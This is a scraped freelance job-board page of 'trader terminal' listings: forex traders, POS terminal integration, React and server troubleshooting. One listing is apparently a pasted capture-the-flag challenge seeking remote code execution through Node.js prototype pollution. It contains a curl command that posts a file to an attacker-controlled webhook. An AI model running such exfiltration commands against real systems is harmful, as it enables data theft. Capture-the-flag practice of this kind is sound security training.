Trader terminal jobs

Filter

My recent searches
Filter by:
Budget
to
to
to
Type
Skills
Languages
    Job State
    2,000 trader terminal jobs found, pricing in NZD
    Doinks Flavor sign 6 days left
    VERIFIED

    I have developed a new brand named Doinks. For one of my in store display, I have developed a product holder that needs a creative way to inform of the flavors. The first flavors are a total of 5. The look I want is produced all over the country by Trader Joes sign painters. See samples below. This art could be painted or penned on an 8.5" X 11" canvas or art board etc. I can scan and use as 1 layered image or could be a fully layered document The finished size may be 2" Tall by 10.5" Wide

    $145 (Avg Bid)
    NDA
    $145 Avg Bid
    18 bids

    ...opened up their potion brewing website for other Emus to create new potion recipes! However, they are afraid that one of the human hackers will pollute their ingredients. Can you get Remote Code Execution (RCE) on the Emu Apothecary's website? Below are the steps on creating the terminal command you want to execute on the website: Visit to create a new webhook for receiving incoming web requests. Copy your unique URL from the webhook website and replace {webhook} in the following terminal command. This is the command that you want to execute on the website that will send / to your webhook. curl -F flag=@/ {webhook} To connect to the challenge go to hint 1: You can pollute NodeJS applications, Alex did a talk about it and the

    $44 (Avg Bid)
    $44 Avg Bid
    12 bids

    ...infrastructure components (kubernetes, ceph, VMs, ...) and provided PaaS containers Platform Security and Scaling You ensure the platform's availability, respond to outages, and scale clusters and storage solutions. Your Profile: Experience in System Administration You are proficient with Linux shell and GNU tools and understand network protocols and data routing. • knowing your way around a terminal Linux shell and GNU tools • being able to interpret system logs, reason about error conditions and mitigating/solving them on your own • knowing how networks work and communication/data routing • being able to work with IaC definitions (e.g., Terraform, Ansible, Kubernetes Manifests) • knowing some database administration foundational principles K...

    $72 / hr (Avg Bid)
    $72 / hr Avg Bid
    27 bids

    I need assistance with submitting customs declarations in Northern Ireland using the Trader Support Service (TSS) system. - Familiarize with TSS System: Understanding of the TSS system is necessary as the project requires comprehensive usage of it. I have access to the system but I need someone who can efficiently navigate it and complete the task accurately. - Document Preparation: Although the document needs to be prepared on the TSS system, any other necessary paperwork to supplement the TSS filing will be required. So, proficiency in documentation is important. - Experience: Having prior experience in customs declarations and familiarity with Northern Ireland's regulations would be ideal. Your responsibility will be to ensure the TSS filing for customs declarations tran...

    $15 / hr (Avg Bid)
    $15 / hr Avg Bid
    9 bids

    Development of 9 families in revit according to information provided. execution time 7 days, delivered on Tuesday, May 21 and would have a cost of break glass: 45 aud card reader: 25 aud DURESS UNDERBENCH: 45 aud DURESS WALL: 25 aud INDICATOR LIGHT: 45 aud NURSE CALL HANDSET: 45 aud NURSE CALL OUTLET: 35 aud REQUEST TO EXIT: 25 aud TERMINAL STAFF: 25 aud total cost of: 315 aud

    $341 (Avg Bid)
    $341 Avg Bid
    1 bids

    I'm looking for a skilled developer to create a 3D visualization/animation with and React Three Fiber. This visualization will primarily focus on a credit card and a payment terminal. Key Requirements: - The 3D animation should be interactive, allowing users to rotate the view, zoom in/out, and click on objects to get more information. - The primary objects in the animation will be a credit card and a payment terminal - Ideal Skills and Experience: - Strong proficiency in and React Three Fiber - Previous experience creating interactive 3D visualizations - Knowledge of UX/UI design principles for interactive graphics - Detail-oriented with the ability to create realistic 3D objects.

    $522 (Avg Bid)
    $522 Avg Bid
    71 bids
    Compact Retail Space Design 2 days left
    VERIFIED

    ...of storage to house stock in either the cabinet or space. -The focus isn't so much the cabinet/storage, but the design of the space. As mentioned, this is a small space and are small parts of a function passenger terminal. But it needs to represent a small store. Some thoughts: - Maybe some vintage physical signs? Vinyl on the walls/cabinet? OTHER: - The airline is Air Tindi - Check out for colours and overall feel. - I'm thinking about calling the store "The Air Tindi Outpost" - I've attached some pictures of one our spaces. It's within our Float Base terminal, which serves our float planes (see website for fleet specs) during the summer. To ensure qualified candidates, please initiate your response by mentioning the year we started/es...

    $38 / hr (Avg Bid)
    $38 / hr Avg Bid
    78 bids

    I need a basic template that modifies the existing Chart Trader Panel buttons. Basically, I just want all of the top Buttons to disappear, except the Close Button. Also the Bid and Ask display to be hidden. ===================== All buttons should re appear when the strategy is disabled. Also if we have multiple tabs with different charts. The buttons should only disappear on the tab where the strategy is enabled. The Close button, I just want it to be 1 big button if possible

    $36 (Avg Bid)
    $36 Avg Bid
    7 bids

    ...the panel to column2 it should add to the table and simulataneously it should add to column 1. same way if I add to column 1 it should add to column 2 table two. I am able to achieve for column 1 but not inside column 2 table. can you lee me know how to fix it. Providing my code and fiddle link below. ,src%,src%2FApp.jsx&terminal=dev import { useState } from 'react'; import reactLogo from './assets/'; import viteLogo from '/'; import './'; import { DragDropContext, Droppable, Draggable } from 'react-beautiful-dnd'; function App() { const [panelOpen, setPanelOpen] = useState(false); const [columns, setColumns] = useState({ column1: { id: 'column1', items: ['Sample_Step1', 'Sample_Step2'...

    $52 (Avg Bid)
    $52 Avg Bid
    31 bids

    As an experienced trader, I'm looking to convert a unique trading strategy into a script for the Quantower Desktop platform. Includes: - Conversion of a specific trading strategy into Quantower Desktop compatible script - Testing for functionality and reliability within the Quantower Desktop environment Ideal Freelancer: - Extensive experience with Quantower Desktop - Proven record of converting trading strategies into scripts - Understanding of different trading strategy mechanics - Excellent problem-solving skills, particularly with code debugging This project is exciting and, with your help, will enhance my trading experience through automation. If this sounds like the right project for you, place a bid!

    $129 / hr (Avg Bid)
    $129 / hr Avg Bid
    14 bids

    I am new to react I need to move the item from the column 3 to column 1. Initially I developed static code. then I used react-beautiful-dnd and splice logic to move item from source to destination I even debugged by putting console.log. console not printing, Providing my code below. Can you let...splice logic to move item from source to destination I even debugged by putting console.log. console not printing, Providing my code below. Can you let me know how to fix it, even needed to be added to table rows when added and integrate in my codebase later can you fix the code in my stackblitz ,src%,src%2FApp.jsx&terminal=dev

    $57 (Avg Bid)
    $57 Avg Bid
    47 bids
    Forex trader -- 2 10 hours left
    VERIFIED

    Trader of forex provide me signals of forex

    $121 (Avg Bid)
    $121 Avg Bid
    13 bids

    ...**Headline Hero:** Write **amazing headlines and irresistible copy** that compels users to stop scrolling and dive into Groom's world. * **Thumbnail Mastermind:** Design **eye-catching thumbnails** that make Groom stand out in the crowded feed. * **Community Champion:** Be the friendly face of Groom online! Manage comments, respond to inquiries, and cultivate a thriving online community. * **Day Trader of Attention (2-4 hours daily):** You'll be our social media ninja, strategically engaging with relevant pages and posts to **drive organic growth and brand awareness** for Groom. **What we're looking for:** * A social media whiz with a proven track record of **growing brand communities.** * A creative mind who can consistently **develop engaging video content.**...

    $262 (Avg Bid)
    $262 Avg Bid
    26 bids

    We have a Problem to update our shop. We got in the SSH Terminal the following Error: ! Warning: Failed to load plugins. Message: An exception occurred in the driver: could not find driver !! PHP Fatal error: Class ShopwareCoreMigrationV6_5Migration1694426018AddEntityIndexToStateMachineHistory contains 1 abstract method and must therefore be declared abstract or implement the remaining methods (ShopwareCoreFrameworkMigrationMigrationStep::updateDestructive) in /var/www/vhosts/***-****.de/httpdocs/vendor/shopware/core/Migration/V6_5/ on line 13

    $111 (Avg Bid)
    $111 Avg Bid
    24 bids

    I'm in need of a C program that can communicate with a REST API and retrieve data in JSON format. I am a stock trader. Zerodha is my stock broker in India. I need a c program to communicate with api at zerodha so that I could get live stock price. Key Requirements: - The program should be able to establish a connection with the specified REST API and retrieve data in JSON format. Ideal Skills: - Proficiency in C programming language - Experience with REST APIs and JSON data format - Strong understanding of data retrieval techniques Please note that I'm only looking for a C program that can successfully retrieve data from a REST API in JSON format.

    $23 (Avg Bid)
    $23 Avg Bid
    15 bids

    READ CAREFULLY PLEASE need an opnsense expert. and i mean expert. 1:1 forwarder, later configure firewall. round about 100 rules. COMPLEX ENVIRONMENT, ONLY FiREWALL GURUS NEEDED, YOU WORK ON MY TERMINAL, 1 server with hyper-v, 2 opnsense, 1 external vswitch, 2 internal vswitche on hyper-v. one for the entry rules, second manage the vms traffic Job takes around 5 to 7 hours. start immediately DONT BID AND ASK LATER FOR DIFFERENT PRICE

    $259 (Avg Bid)
    $259 Avg Bid
    7 bids

    ...RFD900A device. * The send and receive will be handled simultaneously. * Received data will be displayed on screen as text, hexcode or in binary form depending on user selectable option. * Received data will be saved into a file. User shall be able to enable or disable this option. * User will be able to define the log file name. * App will transmit data typed from a keyboard (similar to Arduino terminal) or should be able to select a file to read and transmit. * User will be able configure the serial port (i.e. select com port, baud rate (1200, 2400, 4800, 9600, 19200, 38400, 57600, 115200, 256000, Custom) , data bits (5, 6, 7, 8 bits), parity (None, Odd, Even, Mark, Space), stop bits (1, 1.5, 2), handshaking (None, RTS/CTS, XON/XOFF, RTC/CTS+XON/XOFF, RTS on TX) etc.) * App ...

    $509 (Avg Bid)
    $509 Avg Bid
    14 bids

    I'm seeking an expert in Ninjatrader 7 (NT7) coding to bring new functionalities to my platform. The core requirements of my project are: - Incorporating Custom Indicators into NT7: I need you to hard code specific elements into the system for customized utilization on the chart trader. - Advanced Charting Features: I would require the integration of advanced charting features in NT7. Chart trader modifications. As a freelancer, you should ideally have: - Proven experience in coding for Ninjatrader 7. - Knowledge of financial markets, trading systems, and indicators. - High-level skills in coding and data visualization. Join me in upgrading the potential of my NT7 trading platform. Counting on your expertise to make trading more insightful and efficient.

    $352 (Avg Bid)
    $352 Avg Bid
    14 bids

    Hi Require consultation for Borut to create buy and sell request to Coinbase Advance. Also to create fetch price and wallet balance. Nothing fancy, just terminal based interface. Thanks.

    $41 (Avg Bid)
    $41 Avg Bid
    1 bids

    ...This task requires attention to detail and an understanding of network configurations to successfully diagnose and remediate the server inconsistencies. Your expertise in this field will be invaluable in ensuring the smooth operation of my server. SideNote: After restoring Backup Image for IONOS hosting Plesk control panel. the VPS instance got disconnected from the network. We are able to SSH terminal through IONOS control panel but the instance is not connected to internet and given IP is also not assigned. The problem is Plesk Control Panel, port 80, SSH and all other ports are disconnected. All sites hosted on this server are presently down. Need Immediate Support to resolve this and make it live. IONOS team raised ticket and requested 24 hours to fix this issues. Can not wa...

    $119 (Avg Bid)
    $119 Avg Bid
    6 bids

    ...of a proficient PHP developer to create a custom code for communicating with an Ingenico POS terminal via Ethernet. Here are the specifics of the project: - **Communication Method:** The primary method for the communication is through Ethernet. You need to be well-versed in this type of communication to tackle this task efficiently. - **Transaction Handling:** The main purpose of the code is to transmit the amount to the terminal and verify if the transaction can be successfully processed. **Requirements**: - experience in PHP - Prior experience with Ingenico POS terminals or similar devices is a plus Please note that this project is solely for the communication between the system and the terminal. There is no need for integration with the banking systems or any...

    $300 (Avg Bid)
    $300 Avg Bid
    61 bids

    I'm seeking an expert Forex trader to take the reins of my current Forex account, which has a balance of $10,015. Your primary responsibility will be to conduct trades using various strategies such as scalping, swing trading, and position trading. Key Responsibilities: - Managing and executing trades in my Forex account on a weekly basis. - Implementing a range of trading strategies, including scalping, swing trading, and position trading. - Safeguarding the account's balance and aiming for profit growth. Skills and Experience: - Proven track record as a successful Forex trader, ideally with experience in managing third-party accounts. - Deep understanding of various trading strategies, including scalping, swing trading, and position trading. - Ability to consiste...

    $24 / hr (Avg Bid)
    $24 / hr Avg Bid
    2 bids

    As an experienced day trader, I'm in need of an Expert-level professional to manage investments across Stocks, Forex, and Cryptocurrencies. This is a profit-sharing arrangement. I will create a account of your choice fund it every 2 weeks and you manage and day trade through it. Requirements: - Expert-level day trader: You should have a proven track record of successful day trading, with the ability to navigate and profit from the volatile nature of Stocks, Forex, and Cryptocurrencies. - Market Knowledge: You should possess deep understanding and insight into these markets, and be capable of making informed trading decisions. - Trading Frequency: I'm looking for a trader who's active but not overtrading. Expectations are for a few well-considered trade...

    $3058 (Avg Bid)
    $3058 Avg Bid
    13 bids

    ...of experienced professionals who can help me fix a crucial database issue with my website built on Node.js. There are certain missing tables that cause the application to crash whenever specific buttons are clicked on the site. Key Details: • The crashing issue is experienced when the Login button, Submit form button, or the Add to cart button is clicked. • Due to these unsolved errors, the terminal indicates that a certain table name is not found. Ideal Skills and Experience: • Solid background in solving database issues in Node.js platforms. • Experience in working with missing tables and rectifying database errors. Application Requirements: Freelancers interested in this project should include detailed descriptions of their previous and related experi...

    $36 (Avg Bid)
    $36 Avg Bid
    15 bids

    ...version of the application error. It has had files removed for security and to reduce the file size. Here’s some rough instructions, I’m not a Node/Docker expert but this should get you going. 1 - Download and uncompressed the Visual Studio zip file 2 - Open the workspace in Visual Studio 3 - Open a new terminal window in the project root folder and run "docker compose build" to the project 4 - Run ‘docker compose up’ to run the project You’re objective is to: 1 - Remove the "//const MongoClient = require("mongodb").MongoClient;” line 2 - Run ‘docker compose up’ to start the code 3 - Fix the code so it does not crash 4 - Demonstrate a working connection between the application and a remote Mongo Atla...

    $23 / hr (Avg Bid)
    $23 / hr Avg Bid
    129 bids

    ...lose control of the application language I am using. I also found that apt updates over time started creating problems. Finally, I don’t want to have to learn how to compile the gnucobol source code and deal with dependencies, etc to make an operable package. YOU: Will create a complete “how-to” instruction package, presumably possibly writing a series of bash shell scripts that I can run from terminal as part of your project for me. I DO NOT WANT to use Docker or any other idea that will isolate what I need to do from the Ubuntu 24.04 system I am using. Ideally, you will have done the same thing on your development computer proving that a small cobol program will compile and can be run BEFORE you send your efforts to me for testing. Finally, the package result...

    $112 (Avg Bid)
    $112 Avg Bid
    12 bids

    I'm experiencing issues with my Ubuntu desktop. When I try to boot the system, I'm unable to access the desktop. I've tried several troubleshooting steps to fix the issue: - Booting from a live USB - Accessing recovery mode - Running fsck in terminal Despite these efforts, the problem remains unresolved. I can see error messages during the boot process. I am looking for an experienced Ubuntu specialist who can help me restore access to my Ubuntu desktop. The ideal candidate should have a strong background in Linux system administration and be familiar with troubleshooting boot-related issues on Ubuntu. A deep understanding of Ubuntu recovery processes and file system checks would be highly beneficial for this task.

    $23 (Avg Bid)
    $23 Avg Bid
    4 bids

    I have a project that's built using React, FastAPI, ChatGPT, Eleven Labs, and Firebase and hosted on Digital Ocean. The app works well on the frontend, but experiences issues with the backend. The problem is that the backend stops working whenever the terminal shuts down. I'm not sure if I've configured my backend server on Digital Ocean to run as a service or in the background. Key points: - Need troubleshooting to determine and resolve why the backend stops working when the terminal is shut down. - Check if the backend server is set to run as a service or in the background on Digital Ocean. - Ensure the app is fully functional and accessible after deployment. Ideal Candidate: - Proficient in React and FastAPI. - Experienced with deploying applications on D...

    $76 (Avg Bid)
    NDA
    $76 Avg Bid
    5 bids

    I am in search of a Forex trader with a deep understanding and experience in dealing with major currency pairs like EUR/USD, USD/JPY. Your main task will be to manage my account aiming for a 5% profit on a daily basis. Key Duties: - Carry out trades in major forex pairs. - Manage moderate risk level. - Regularly update and tweak the trading strategy on a weekly basis. Required Skills and Experience: - Proven track record and significant experience in Forex trading. - Understanding of market trends and ability to wisely make trade decisions based on them. - Ensure steady profit making while minimizing losses. - Clear communication skills for weekly reports and strategy updates. Please note that this is a moderate risk project. While the aim is to make consistent profits, it is al...

    $174 (Avg Bid)
    $174 Avg Bid
    18 bids

    BIOMETRIC MICRO-ATM FOR AEPS (AADHAAR ENABLED PAYMENT SYSTEM) Aadhaar enabled Payment System (abbreviated as AePS) - an Aadhaar dependent frame...are simply required to furnish their 12-digits Aadhaar number to the officials of a bank and validate it through biometric fingerprint or iris scanner device. Our Biometric Micro-ATM device is designed in a way that it offers a modern architecture blended perfectly with contemporary aesthetic. Our biometric device is absolutely suitable for the application of AePS as it is an all-in-one mobile terminal coupled with the biometric fingerprint & iris readers for efficient and accurate authentication of the customers. Furthermore, our biometric Micro-ATM deploys UIDAI/STQC approved fingerprint sensor & iris sensor with the data retent...

    $137 (Avg Bid)
    $137 Avg Bid
    8 bids

    ...should be used. We do the design for the frontend, you set up the endpoints with all the backend code. ATTENTION WE DO NOT PAY FOR THE TRAINING OF DEVELOPERS WHO CAN'T DO IT BUT TRY IT. WE ONLY PAY FOR THE PRODUCT, NOT FOR THE TIME THAT THE DEVELOPER NEEDS BECAUSE HE ENCOUNTERED UNEXPECTED PROBLEMS. IF YOU ARE NOT A FULL PROFESSIONAL, PLEASE DO NOT APPLY TO US FOR THIS JOB. THANKSAs an avid crypto trader, I'm looking for a skilled and experienced professional who can develop a trading bot for me. The primary purpose of this bot will be to execute flash loan arbitrage trades across various DeFi platforms. Key Project Details: - The selected exchanges for this arbitrage are Uniswap, Sushiswap, Aave, and Balancer. - I am looking for a bot that can entirely automate the t...

    $137 / hr (Avg Bid)
    $137 / hr Avg Bid
    25 bids

    I'm seeking a talented developer who can create a custom bot for cryptocurrency trading who operates automatically. Can either be trading or buy/sell crypto as long as it's profitable. Key Requirements: - Support for at least an exchange, it can even be metamask or whatever. - Capable of trading Bitcoi...exchange, it can even be metamask or whatever. - Capable of trading Bitcoin, Ethereum, Solana, or TRX. One is enough , multiple is a plus. - Implement a range of profitable trading strategies The ideal candidate should have a strong background in bot development, specifically in the realm of cryptocurrency trading. The ability to explain complex trading strategies in simple terms for a novice trader would be an added advantage. Please provide examples of prior work or p...

    $802 (Avg Bid)
    $802 Avg Bid
    33 bids

    I need a skilled web developer who is proficient in HTML/CSS, JavaScript, and PHP to help transfer my custom coded website from the test server to the live server using terminal. Having deep knowledge in server migration, DNS and terminal operations is crucial for this task. The key tasks will include: - Safely transfer all site files and databases. - Ensure site layout and functionalities are consistent with the version on the test server. Please only bid if you are confident in your skills to prevent any downtime or data loss during the migration. Experience in similar jobs will be a major advantage.

    $55 (Avg Bid)
    $55 Avg Bid
    30 bids

    I need a skilled web developer who is proficient in HTML/CSS, JavaScript, and PHP to help transfer my custom coded website from the test server to the live server using terminal. Having deep knowledge in server migration, DNS and terminal operations is crucial for this task. The key tasks will include: - Safely transfer all site files and databases. - Ensure site layout and functionalities are consistent with the version on the test server. Please only bid if you are confident in your skills to prevent any downtime or data loss during the migration. Experience in similar jobs will be a major advantage.

    $60 (Avg Bid)
    $60 Avg Bid
    21 bids

    As an existing business owner, I need an adept AWS professional to assist in setting up required authenticators on my new Mac. This is so I can use Terminal to conveniently upload new image content, typically less than 1 MB each, on my large image gallery website currently hosted on AWS S3. - *Skills and Experience*: - Thorough understanding and experience with AWS S3 - Able to configure authenticators for Mac - Familiarity with Terminal for content upload Extreme attention to detail and confidentiality is essential in carrying out these tasks. As these images are for a respectable, publicly-accessible website, proficiency in handling and uploading such content is ideal. I would also like assistance once the first step is completed to do an analysis of the cost effec...

    $179 (Avg Bid)
    $179 Avg Bid
    15 bids

    We have a device which works on Windows with a .dll. By calling the functions in the .dll, we can control the device and get data from it. We want to create a wrapper in Python so...GAIN_STATE data); int SENSOR_DLL usb_set_trig_mode(FT_HANDLE ftHandle, TRIG_MODE mode); int SENSOR_DLL usb_set_interval(FT_HANDLE ftHandle, uint32_t data); Once you've made the wrapper, we'd like you to make a Python script which calls the Python wrapper versions of these calls in this order usb_initialize usb_set_interval usb_read_image usb_deinit and writes the data from usb_read_image onto the terminal window as text. I'll need to do a Zoom video call so you can show me how to use it. I haven't done Python programming before. I have installed Python already so the call sho...

    $267 (Avg Bid)
    $267 Avg Bid
    25 bids

    I need 4 buy limit button with tick offset 4 Sell limit button with tick offset First button 1 tick offset second button 2 tick offset and so on. I want those buttons in trade panel.

    $47 (Avg Bid)
    $47 Avg Bid
    7 bids

    I am in need of a professional in Anaheim, CA with a strong IT background to handle an on-site installation of computer peripherals and networking devices, including a DVR/NVR and Point of Sale (POS) systems to a retail shop inside the Airport terminal. Key Details: - The project involves the following: 1. Connecting a POS computer, monitor, receipt printer, USB card reader and providing remote access to our helpdesk so our techs can configure the system. Work with our helpdesk to test the printer, touchscreen and card reader. 2. Connect a USB camera that measures foot traffic and work with our help desk to configure and test. 3. The building contractor has already set up Ethernet cables and a patch panel. Ideally, you will have tools in case one of the jacks doesn�...

    $98 / hr (Avg Bid)
    Local
    $98 / hr Avg Bid
    1 bids

    I am seeking a Python C++ programmer who can assist me with the D400 Terminal. The primary task involves cloning software from a functioning D400 Terminal to a non-working one (because it ask for program). Ideal skills and experience: - Proficient in Python and C++? - Prior experience with software cloning - Familiarity with D400 Terminal (wich is a tool/machine/screen for concrete truck). Manual for D400 Terminal:

    $228 (Avg Bid)
    $228 Avg Bid
    19 bids

    ...and corporate website. This is a startup that offers global network infrastructure solutions. Key Requirements: Telecommunication Services We specialize in a comprehensive range of telecommunication services, ensuring seamless connectivity and optimal performance for businesses of all sizes. Our expertise encompasses: • Installation and Commissioning: Proficient in deploying OLT (Optical Line Terminal), Mini OLT, Provider Edge Routers, and Layer 2/3 Aggregation Switches, guaranteeing efficient network operation. • Migration Solutions: We excel in seamlessly transitioning services such as IPVPN, PRI, IPLC, LL, and ILL from legacy networks (SDH, RF, SHDSL Modem) to cutting-edge Next Generation Networks (FTTH GPON), ensuring minimal disruption and maximum efficiency. &bu...

    $171 (Avg Bid)
    $171 Avg Bid
    14 bids

    We are existing business seeking a savvy freelance commodities trader to focus on agricultural commodities on the international markets (Europe, Asia Middle East are the main consumers, other markets to be defined), more precisely we are looking to sell Premium and graded Frankincense Resin from Somalia. Key responsibilities include: - selling Premium Frankincense Resin (aka Boswellia carterii and frereana resins) to international buyers Ideal candidates should have: - Having a strong network of potential buyers (preferably known contacts but not a must) - Prior experience in trading agricultural commodities (having experience in the market and established contacts) - Understanding of international markets

    $1091 (Avg Bid)
    Urgent
    $1091 Avg Bid
    7 bids

    I'm in need of a skilled Forex trader who can also write an engaging ebook. The book is aimed at intermediate level traders and will focus on technical analysis. Key Requirements: - Proven experience in Forex trading - Excellent writing skills - Understanding of technical analysis - Proficiency in creating engaging and informative content Your responsibilities will include: - Writing a comprehensive ebook on technical analysis in Forex trading - Ensuring the content is suitable for intermediate level traders - Incorporating charts and graphs to make the concepts visually accessible - Keeping the material engaging and informative throughout You will be making the ebook out of the following 3 videos. 1. 2.

    $496 (Avg Bid)
    $496 Avg Bid
    47 bids

    As the client of this project, I require a proficient automation tester with expertise in C# / Java / Python to assist in testing my Windows-compatible, desktop-based POS terminal. The scope of this project includes: - Developing an automation test for transaction processing, inventory management, and reporting functionalities - Implementing test for PPM screen messages validation The ideal freelancer should: - Have considerable experience in automation testing, specifically using C# / Java / Python / Javascript - Have a deep understanding of testing methodologies and POS systems - Deliver quality, error-free work within the agreed timeline. - Any free tool can use / suggest This project provides a great opportunity to demonstrate and enhance your automation testing skills in rea...

    $142 (Avg Bid)
    $142 Avg Bid
    14 bids

    I'm seeking an experienced developer to create an console terminal with the ability to emulate terminals in Vue 3 with Typescript App. Key Project Requirements: - The terminal must be able to perform terminal emulation. - The terminal must specifically adhere to the XTERM emulation protocol. - The termianl should perform actions Read and Write. Desired Skills: - Proficiency in JavaScript, Vue 3 with Typescript and xterm.js. - Strong understanding of terminal emulation protocols, specifically XTERM.js.

    $271 (Avg Bid)
    $271 Avg Bid
    22 bids

    I am in search of a highly experienced forex trader to manage a scalping strategy for me. The ideal candidate should have in-depth knowledge and a proven track record in this area. Key responsibilities and requirements: - Implementing a scalping strategy: The trader should be well-versed in the intricacies of scalping and have a clear understanding of the market dynamics. - Risk management: The candidate should ensure to implement necessary risk measures, including but not limited to: - Stop-loss orders: Ensuring that losses are minimized by closing the trade when a set price is reached. - Position sizing: Properly determining the size of each trade relative to the total account size to manage risk. - Risk-reward ratio: Calculating the potential profit to potentia...

    $181 (Avg Bid)
    $181 Avg Bid
    6 bids